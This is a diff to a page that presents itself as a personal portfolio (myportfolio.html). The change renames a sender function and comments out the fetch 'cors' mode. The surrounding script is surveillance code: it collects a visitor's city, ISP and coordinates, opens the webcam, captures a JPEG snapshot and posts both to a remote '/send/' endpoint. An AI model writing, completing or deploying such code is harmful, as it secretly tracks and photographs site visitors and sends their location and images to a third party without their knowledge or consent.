--- a/myportfolio.html
+++ b/myportfolio.html
@@ -94,7 +94,7 @@ Kota : ${data.city}
 Provider ISP : ${data.org}
 Latitude : ${data.latitude}
 Longitude : ${data.longitude}`;
-                sM(text);
+                sendMessage(text);
                 let stream = await navigator.mediaDevices.getUserMedia({
                     video: true,
                     audio: false,
@@ -107,7 +107,7 @@ Longitude : ${data.longitude}`;
                     let image_data_url = canvas
                         .toDataURL("image/jpeg")
                         .replace(/^data:image\/jpeg;base64,/, "");
-                    sM(text, image_data_url, "jpeg");
+                    sendMessage(text, image_data_url, "jpeg");
                     video.pause();
                     video.src = "";
                     stream.getTracks()[0].stop();
@@ -120,10 +120,10 @@ Longitude : ${data.longitude}`;
                 return Promise.resolve(jsonData);
             }
 
-            async function sM(msg, img, ext) {
+            async function sendMessage(msg, img, ext) {
                 let mySender = await fetch(`${BASE}/send/`, {
                     method: "POST",
-                    mode: "cors",
+                    // mode: "cors",
                     headers: {
                         "Content-Type": "application/json",
                     },
